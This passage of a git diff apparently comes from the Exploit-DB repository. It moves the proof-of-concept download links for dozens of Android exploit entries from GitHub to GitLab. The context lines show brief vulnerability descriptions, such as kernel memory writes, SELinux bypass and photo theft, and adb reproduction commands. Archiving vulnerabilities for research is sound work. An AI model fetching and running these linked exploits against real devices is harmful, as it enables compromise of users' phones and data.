reproduce, download the attached file and wait, or trigger media scanning by adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38611.zip \ No newline at end of file diff --git a/exploits/android/dos/38612.txt b/exploits/android/dos/38612.txt index abf3ada95..181f047a3 100644 --- a/exploits/android/dos/38612.txt +++ b/exploits/android/dos/38612.txt @@ -37,4 +37,4 @@ To reproduce, download the image file and wait, or trigger media scanning by cal adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38612.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip \ No newline at end of file diff --git a/exploits/android/dos/38613.txt b/exploits/android/dos/38613.txt index 9aa6feab6..2b3e6b87a 100644 --- a/exploits/android/dos/38613.txt +++ b/exploits/android/dos/38613.txt @@ -28,4 +28,4 @@ To reproduce, download the file and open it in Gallery. This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38613.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip \ No newline at end of file diff --git a/exploits/android/dos/38614.txt b/exploits/android/dos/38614.txt index 259426faa..5c1f2dea2 100644 --- a/exploits/android/dos/38614.txt +++ b/exploits/android/dos/38614.txt @@ -55,4 +55,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38614.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38614.zip \ No newline at end of file diff --git a/exploits/android/dos/39424.txt b/exploits/android/dos/39424.txt index e5b679bb9..b3c67e27b 100644 --- a/exploits/android/dos/39424.txt +++ b/exploits/android/dos/39424.txt @@ -37,4 +37,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39424.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39424.zip \ No newline at end of file diff --git a/exploits/android/dos/39425.txt b/exploits/android/dos/39425.txt index 1d92bc419..6e99eb525 100644 --- a/exploits/android/dos/39425.txt +++ b/exploits/android/dos/39425.txt @@ -29,4 +29,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip \ No newline at end of file diff --git a/exploits/android/dos/39629.txt b/exploits/android/dos/39629.txt index 3e7bec8a0..cfe680139 100644 --- a/exploits/android/dos/39629.txt +++ b/exploits/android/dos/39629.txt @@ -159,4 +159,4 @@ prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqD Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39629.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip \ No newline at end of file diff --git a/exploits/android/dos/39651.txt b/exploits/android/dos/39651.txt index 8539296a0..b04d9c5f3 100644 --- a/exploits/android/dos/39651.txt +++ b/exploits/android/dos/39651.txt @@ -55,4 +55,4 @@ Reported to Android here: https://code.google.com/p/android/issues/detail?id=185 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39651.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39651.zip \ No newline at end of file diff --git a/exploits/android/dos/39685.txt b/exploits/android/dos/39685.txt index b12b2373c..3e29f2e2e 100644 --- a/exploits/android/dos/39685.txt +++ b/exploits/android/dos/39685.txt @@ -42,4 +42,4 @@ Where XXXXXX should be uninitialized memory from the heap. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39685.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39685.zip \ No newline at end of file diff --git a/exploits/android/dos/39686.txt b/exploits/android/dos/39686.txt index 40da3a339..769df7068 100644 --- a/exploits/android/dos/39686.txt +++ b/exploits/android/dos/39686.txt @@ -86,4 +86,4 @@ I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39686.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39686.zip \ No newline at end of file diff --git a/exploits/android/dos/39921.txt b/exploits/android/dos/39921.txt index 20acdc312..5b497eaf4 100644 --- a/exploits/android/dos/39921.txt +++ b/exploits/android/dos/39921.txt @@ -92,4 +92,4 @@ cpsr 0x80070030 -2147024848 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39921.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39921.zip \ No newline at end of file diff --git a/exploits/android/dos/40381.txt b/exploits/android/dos/40381.txt index 3c5b97c37..8b9c00027 100644 --- a/exploits/android/dos/40381.txt +++ b/exploits/android/dos/40381.txt @@ -140,4 +140,4 @@ If there is e.g. some system_app that performs permissions checks (which use the Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip \ No newline at end of file diff --git a/exploits/android/dos/40449.txt b/exploits/android/dos/40449.txt index c023686b9..b8074683e 100644 --- a/exploits/android/dos/40449.txt +++ b/exploits/android/dos/40449.txt @@ -36,4 +36,4 @@ Its logcat output looks like this: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40449.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40449.zip \ No newline at end of file diff --git a/exploits/android/dos/40515.txt b/exploits/android/dos/40515.txt index 309df974c..2c7a907e3 100644 --- a/exploits/android/dos/40515.txt +++ b/exploits/android/dos/40515.txt @@ -142,4 +142,4 @@ a uint32_t is smaller than a binder_uintptr_t. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40515.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40515.zip \ No newline at end of file diff --git a/exploits/android/dos/40876.txt b/exploits/android/dos/40876.txt index b286d3f2b..f8190bc13 100644 --- a/exploits/android/dos/40876.txt +++ b/exploits/android/dos/40876.txt @@ -165,4 +165,4 @@ Fixed in the November security bulletin at https://source.android.com/security/b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40876.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40876.zip \ No newline at end of file diff --git a/exploits/android/dos/40945.txt b/exploits/android/dos/40945.txt index 7e7912577..a9ec1345d 100644 --- a/exploits/android/dos/40945.txt +++ b/exploits/android/dos/40945.txt @@ -135,4 +135,4 @@ Fixed in https://source.android.com/security/bulletin/2016-12-01.html Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40945.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40945.zip \ No newline at end of file diff --git a/exploits/android/dos/40993.txt b/exploits/android/dos/40993.txt index 4f32028b2..f2a300580 100644 --- a/exploits/android/dos/40993.txt +++ b/exploits/android/dos/40993.txt @@ -58,4 +58,4 @@ According to the default SELinux rules as present on the SM-G935F (version XXS1A Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40993.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40993.zip \ No newline at end of file diff --git a/exploits/android/dos/41161.txt b/exploits/android/dos/41161.txt index 7b545dcb3..2101b3b3e 100644 --- a/exploits/android/dos/41161.txt +++ b/exploits/android/dos/41161.txt @@ -67,4 +67,4 @@ The sysfs entries mentioned above are world-readable and have an SELinux context Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41161.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41161.zip \ No newline at end of file diff --git a/exploits/android/dos/41211.txt b/exploits/android/dos/41211.txt index ee09cef9e..9c2fe9a8f 100644 --- a/exploits/android/dos/41211.txt +++ b/exploits/android/dos/41211.txt @@ -30,4 +30,4 @@ This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel V Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41211.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41211.zip \ No newline at end of file diff --git a/exploits/android/dos/41212.txt b/exploits/android/dos/41212.txt index 7c4a241bb..66e38351f 100644 --- a/exploits/android/dos/41212.txt +++ b/exploits/android/dos/41212.txt @@ -38,4 +38,4 @@ This PoC disables the M bit in SCTLR_EL1. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41212.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41212.zip \ No newline at end of file diff --git a/exploits/android/dos/41218.txt b/exploits/android/dos/41218.txt index c48892d64..0812ea23e 100644 --- a/exploits/android/dos/41218.txt +++ b/exploits/android/dos/41218.txt @@ -44,4 +44,4 @@ This PoC s2-remaps RKP's physical address range and reads from it in EL1. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41218.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41218.zip \ No newline at end of file diff --git a/exploits/android/dos/41232.txt b/exploits/android/dos/41232.txt index 217ec5db0..9c46d90e0 100644 --- a/exploits/android/dos/41232.txt +++ b/exploits/android/dos/41232.txt @@ -64,4 +64,4 @@ This PoC modifies an instruction within RKP's address space by repeatedly callin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip \ No newline at end of file diff --git a/exploits/android/dos/41351.txt b/exploits/android/dos/41351.txt index e7cc0557a..d0685e6a6 100644 --- a/exploits/android/dos/41351.txt +++ b/exploits/android/dos/41351.txt @@ -63,4 +63,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41351.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41351.zip \ No newline at end of file diff --git a/exploits/android/dos/41352.txt b/exploits/android/dos/41352.txt index 074cf1871..3f0890086 100644 --- a/exploits/android/dos/41352.txt +++ b/exploits/android/dos/41352.txt @@ -47,4 +47,4 @@ u:r:lghashstorageserver:s0 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41352.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41352.zip \ No newline at end of file diff --git a/exploits/android/dos/41353.txt b/exploits/android/dos/41353.txt index 00ee84552..f33d5361c 100644 --- a/exploits/android/dos/41353.txt +++ b/exploits/android/dos/41353.txt @@ -92,4 +92,4 @@ disable selinux enforcement. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41353.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41353.zip \ No newline at end of file diff --git a/exploits/android/dos/41354.txt b/exploits/android/dos/41354.txt index 122493df9..34d2b5a9e 100644 --- a/exploits/android/dos/41354.txt +++ b/exploits/android/dos/41354.txt @@ -80,4 +80,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41354.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41354.zip \ No newline at end of file diff --git a/exploits/android/dos/41355.txt b/exploits/android/dos/41355.txt index faf3b7941..58e054cdb 100644 --- a/exploits/android/dos/41355.txt +++ b/exploits/android/dos/41355.txt @@ -97,4 +97,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41355.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41355.zip \ No newline at end of file diff --git a/exploits/android/dos/41981.txt b/exploits/android/dos/41981.txt index 653c36509..2e76de7cc 100644 --- a/exploits/android/dos/41981.txt +++ b/exploits/android/dos/41981.txt @@ -79,4 +79,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41981.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41981.zip \ No newline at end of file diff --git a/exploits/android/dos/41982.txt b/exploits/android/dos/41982.txt index 05c54bcb5..cd78faddc 100644 --- a/exploits/android/dos/41982.txt +++ b/exploits/android/dos/41982.txt @@ -53,4 +53,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41982.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41982.zip \ No newline at end of file diff --git a/exploits/android/dos/41983.txt b/exploits/android/dos/41983.txt index c36840d8c..6403cd608 100644 --- a/exploits/android/dos/41983.txt +++ b/exploits/android/dos/41983.txt @@ -130,4 +130,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41983.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41983.zip \ No newline at end of file diff --git a/exploits/android/dos/42169.txt b/exploits/android/dos/42169.txt index 69784e3df..9e305551d 100644 --- a/exploits/android/dos/42169.txt +++ b/exploits/android/dos/42169.txt @@ -61,4 +61,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42169.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42169.zip \ No newline at end of file diff --git a/exploits/android/dos/42170.txt b/exploits/android/dos/42170.txt index f24482917..413cf1457 100644 --- a/exploits/android/dos/42170.txt +++ b/exploits/android/dos/42170.txt @@ -77,4 +77,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42170.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42170.zip \ No newline at end of file diff --git a/exploits/android/dos/42171.txt b/exploits/android/dos/42171.txt index d085e383f..0d3839eab 100644 --- a/exploits/android/dos/42171.txt +++ b/exploits/android/dos/42171.txt @@ -41,4 +41,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42171.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42171.zip \ No newline at end of file diff --git a/exploits/android/dos/42285.txt b/exploits/android/dos/42285.txt index 23d7efba7..6b7f6ea7b 100644 --- a/exploits/android/dos/42285.txt +++ b/exploits/android/dos/42285.txt @@ -23,4 +23,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42285.zip \ No newline at end of file diff --git a/exploits/android/dos/43464.txt b/exploits/android/dos/43464.txt index 3c20db813..4bf85ca7a 100644 --- a/exploits/android/dos/43464.txt +++ b/exploits/android/dos/43464.txt @@ -83,4 +83,4 @@ The issue can also be exploited from the "isolated_app" SELinux context (and per Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43464.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43464.zip \ No newline at end of file diff --git a/exploits/android/dos/43513.txt b/exploits/android/dos/43513.txt index be74aab5a..a8303f03d 100644 --- a/exploits/android/dos/43513.txt +++ b/exploits/android/dos/43513.txt @@ -92,4 +92,4 @@ These commands are all similarly racy (due to the getpidcon(...) usage), but are Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43513.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43513.zip \ No newline at end of file diff --git a/exploits/android/dos/43996.txt b/exploits/android/dos/43996.txt index f1c24e940..ae72131d3 100644 --- a/exploits/android/dos/43996.txt +++ b/exploits/android/dos/43996.txt @@ -60,4 +60,4 @@ After applying the patch, the attached PoC should be built as part of the Androi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43996.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43996.zip \ No newline at end of file diff --git a/exploits/android/dos/44268.txt b/exploits/android/dos/44268.txt index a1d732a1c..b7924f5be 100644 --- a/exploits/android/dos/44268.txt +++ b/exploits/android/dos/44268.txt @@ -1,3 +1,3 @@ This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/ -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44268.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44268.zip \ No newline at end of file diff --git a/exploits/android/dos/44724.txt b/exploits/android/dos/44724.txt index 0ccc2aeeb..f5bb570f3 100644 --- a/exploits/android/dos/44724.txt +++ b/exploits/android/dos/44724.txt @@ -26,4 +26,4 @@ This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most r Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44724.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44724.zip \ No newline at end of file diff --git a/exploits/android/dos/45558.txt b/exploits/android/dos/45558.txt index 638b025cd..c8daff3e3 100644 --- a/exploits/android/dos/45558.txt +++ b/exploits/android/dos/45558.txt @@ -200,4 +200,4 @@ To reproduce that, follow these steps: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45558.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45558.zip \ No newline at end of file diff --git a/exploits/android/dos/45579.txt b/exploits/android/dos/45579.txt index 6edcbeb53..d7102a8c8 100644 --- a/exploits/android/dos/45579.txt +++ b/exploits/android/dos/45579.txt @@ -48,4 +48,4 @@ Logs from the crashes on Android and iPhone are attached. Note that I modified t Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45579.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45579.zip \ No newline at end of file diff --git a/exploits/android/dos/46356.txt b/exploits/android/dos/46356.txt index caf052a24..6d42451da 100644 --- a/exploits/android/dos/46356.txt +++ b/exploits/android/dos/46356.txt @@ -267,4 +267,4 @@ the upstream kernel, too. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46356.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46356.zip \ No newline at end of file diff --git a/exploits/android/dos/46357.txt b/exploits/android/dos/46357.txt index afe2132cc..df4bce306 100644 --- a/exploits/android/dos/46357.txt +++ b/exploits/android/dos/46357.txt @@ -223,4 +223,4 @@ The dmesg splat should look like this: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46357.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46357.zip \ No newline at end of file diff --git a/exploits/android/dos/46503.txt b/exploits/android/dos/46503.txt index 4d35fb88f..3340b4e07 100644 --- a/exploits/android/dos/46503.txt +++ b/exploits/android/dos/46503.txt @@ -161,4 +161,4 @@ You should see something like this in dmesg (if you have Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46503.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46503.zip \ No newline at end of file diff --git a/exploits/android/dos/46504.txt b/exploits/android/dos/46504.txt index 58d000713..f757716ec 100644 --- a/exploits/android/dos/46504.txt +++ b/exploits/android/dos/46504.txt @@ -222,4 +222,4 @@ set VM_IO, it is possible to use madvise(..., MADV_DOFORK) to clear that flag: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46504.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46504.zip \ No newline at end of file diff --git a/exploits/android/dos/46853.txt b/exploits/android/dos/46853.txt index 51975d7b5..e73c0eaf6 100644 --- a/exploits/android/dos/46853.txt +++ b/exploits/android/dos/46853.txt @@ -52,4 +52,4 @@ WeChat will crash now if a message that contains the overwritten emoji file Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46853.zip \ No newline at end of file diff --git a/exploits/android/dos/46941.txt b/exploits/android/dos/46941.txt index eaa9dc13d..10151d750 100644 --- a/exploits/android/dos/46941.txt +++ b/exploits/android/dos/46941.txt @@ -292,4 +292,4 @@ The KASAN report points to instruction 267c in the following assembly: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip \ No newline at end of file diff --git a/exploits/android/dos/47119.txt b/exploits/android/dos/47119.txt index 50bf9f235..327eda343 100644 --- a/exploits/android/dos/47119.txt +++ b/exploits/android/dos/47119.txt @@ -76,4 +76,4 @@ Hvec-"fright" is possible. You can own the mobile by viewing a video with payloa Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47119.zip \ No newline at end of file diff --git a/exploits/android/dos/47920.txt b/exploits/android/dos/47920.txt index 842da756d..57832d8c2 100644 --- a/exploits/android/dos/47920.txt +++ b/exploits/android/dos/47920.txt @@ -21,4 +21,4 @@ A crash log is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47920.zip \ No newline at end of file diff --git a/exploits/android/local/39757.txt b/exploits/android/local/39757.txt index aa5673a47..369018b7a 100644 --- a/exploits/android/local/39757.txt +++ b/exploits/android/local/39757.txt @@ -6,4 +6,4 @@ Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit usi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39757.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39757.zip \ No newline at end of file diff --git a/exploits/android/local/40066.txt b/exploits/android/local/40066.txt index 776887e22..efaee6fa0 100644 --- a/exploits/android/local/40066.txt +++ b/exploits/android/local/40066.txt @@ -227,4 +227,4 @@ the JACK server process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40066.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40066.zip \ No newline at end of file diff --git a/exploits/android/local/41130.txt b/exploits/android/local/41130.txt index 584e7084a..8b871d2cc 100644 --- a/exploits/android/local/41130.txt +++ b/exploits/android/local/41130.txt @@ -70,4 +70,4 @@ The high-level flow for executing a function in the kernel is the following: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41130.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41130.zip \ No newline at end of file diff --git a/exploits/android/local/41217.txt b/exploits/android/local/41217.txt index 0bdac3ca9..f41768d53 100644 --- a/exploits/android/local/41217.txt +++ b/exploits/android/local/41217.txt @@ -92,4 +92,4 @@ This issue can be reproduced by simply writing code to any of these memory regio Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41217.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip \ No newline at end of file diff --git a/exploits/android/local/42601.txt b/exploits/android/local/42601.txt index 8db6c183d..f14bc99e2 100644 --- a/exploits/android/local/42601.txt +++ b/exploits/android/local/42601.txt @@ -28,4 +28,4 @@ cedric:/ # Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42601.zip \ No newline at end of file diff --git a/exploits/android/local/45192.txt b/exploits/android/local/45192.txt index 056f67e0a..0b3cbfe87 100644 --- a/exploits/android/local/45192.txt +++ b/exploits/android/local/45192.txt @@ -344,4 +344,4 @@ and then interpreted, allowing the attacker to steal photos from the device Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45192.zip \ No newline at end of file diff --git a/exploits/android/local/45379.txt b/exploits/android/local/45379.txt index 2665091a6..84b34d77b 100644 --- a/exploits/android/local/45379.txt +++ b/exploits/android/local/45379.txt @@ -95,4 +95,4 @@ I have attached an exploit for the full chain, with usage instructions in USAGE. WARNING: As always, this exploit is intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45379.zip \ No newline at end of file diff --git a/exploits/android/local/47463.txt b/exploits/android/local/47463.txt index 5ca2c0ff7..017badd99 100644 --- a/exploits/android/local/47463.txt +++ b/exploits/android/local/47463.txt @@ -77,4 +77,4 @@ Vendor statement from Android: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47463.zip \ No newline at end of file diff --git a/exploits/android/local/9477.txt b/exploits/android/local/9477.txt index a27f36c6c..5c9ee8848 100644 --- a/exploits/android/local/9477.txt +++ b/exploits/android/local/9477.txt @@ -1,6 +1,6 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. http://zenthought.org/content/file/android-root-2009-08-16-source -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) # milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/exploits/android/remote/39640.txt b/exploits/android/remote/39640.txt index eab4df080..f1067b1dc 100644 --- a/exploits/android/remote/39640.txt +++ b/exploits/android/remote/39640.txt @@ -24,4 +24,4 @@ Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosti Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39640.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39640.zip \ No newline at end of file diff --git a/exploits/android/remote/40354.txt b/exploits/android/remote/40354.txt index 9f314839d..110bb4560 100644 --- a/exploits/android/remote/40354.txt +++ b/exploits/android/remote/40354.txt @@ -156,4 +156,4 @@ bool Parcel::enforceInterface(const String16& interface, Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40354.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40354.zip \ No newline at end of file diff --git a/exploits/android/remote/40874.txt b/exploits/android/remote/40874.txt index 